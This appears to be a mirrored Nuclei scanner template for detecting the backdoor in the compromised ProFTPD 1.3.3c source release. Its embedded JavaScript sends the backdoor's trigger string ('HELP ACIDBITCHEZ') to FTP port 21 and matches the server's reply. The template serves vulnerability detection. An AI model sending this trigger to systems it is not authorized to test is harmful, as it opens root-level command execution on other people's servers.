mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-13 14:13:34 +08:00
50 lines
1.8 KiB
YAML
50 lines
1.8 KiB
YAML
id: CVE-2010-20103
|
|
|
|
info:
|
|
name: ProFTPd-1.3.3c - Backdoor Command Execution
|
|
author: pussycat0x
|
|
severity: critical
|
|
description: |
|
|
ProFTPD 1.3.3c contains a command injection backdoor caused by a hidden FTP command trigger in the source tarball, letting remote unauthenticated attackers execute arbitrary shell commands with root privileges.
|
|
impact: |
|
|
Unauthenticated attackers can execute arbitrary shell commands with root privileges by sending specially crafted HELP commands that trigger the hidden backdoor in the compromised source tarball.
|
|
remediation: |
|
|
Update to a version later than 1.3.3c or the latest available version.
|
|
reference:
|
|
- https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md
|
|
- https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/
|
|
- https://www.exploit-db.com/exploits/15662
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: product:\"ProFTPD\"
|
|
tags: cve,cve2010,js,network,proftpd,ftp,backdoor,vkev,passive,vuln
|
|
|
|
javascript:
|
|
- pre-condition: |
|
|
isPortOpen(Host,Port);
|
|
|
|
code: |
|
|
const data = "HELP ACIDBITCHEZ\r\n";
|
|
const c = require("nuclei/net");
|
|
let conn = c.Open('tcp', `${Host}:${Port}`);
|
|
conn.Send(data);
|
|
let resp = conn.RecvString();
|
|
Export(resp);
|
|
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 21
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "success == true"
|
|
- "contains(response, '220 ProFTPD 1.3.3c')"
|
|
condition: and
|
|
|
|
- type: word
|
|
words:
|
|
- "contains(response, '502 Unknown command')"
|
|
negative: true
|
|
# digest: 4a0a0047304502200b6d58fdf3ef7a36e45b03ad3274878948279fd0cd22f22ecb6c11f2b7247da1022100fdd8adc4ff9c4b472791e1c5a7e4d1fde068559d9093576a5cf7269e59ba781b:922c64590222798bb761d5b6d8e72950 |